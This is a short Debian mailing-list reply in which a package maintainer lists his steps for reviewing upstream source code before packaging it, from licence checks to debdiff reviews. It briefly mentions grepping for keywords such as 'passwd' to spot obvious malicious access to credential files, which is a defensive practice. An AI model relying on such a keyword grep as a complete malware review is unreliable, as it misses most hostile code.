On Mon, 29 Sep 2014, John wrote: > Hey, just for curiosity, do you guys read all the source code before make it > available on repos?
With a stretch of definition of 'all', I usually 1. glance/review high level structure/licenses 2. identify if any 3rd party module must go into separate pkg/use system-wide available; and strip them 3. Depending on the level of trust to the developers, grep for some obvious malicious activities (etc, passwd, etc) 4. Perform more thorough license/copyright review while also glancing over the code base (in scientific software it is still way too common to find snippets from e.g. numerical recipes) . Some times just do in mc, some times in emacs/dired 5. proceed with packaging in the next revisions, rely on debdiff to review changes from the previous upload -- Yaroslav O. Halchenko, Ph.D. http://neuro.debian.net http://www.pymvpa.org http://www.fail2ban.org Research Scientist, Psychological and Brain Sciences Dept. Dartmouth College, 419 Moore Hall, Hinman Box 6207, Hanover, NH 03755 Phone: +1 (603) 646-9834 Fax: +1 (603) 646-1419 WWW: http://www.linkedin.com/in/yarik -- To UNSUBSCRIBE, email to [email protected] with a subject of "unsubscribe". Trouble? Contact [email protected] Archive: https://lists.debian.org/[email protected]
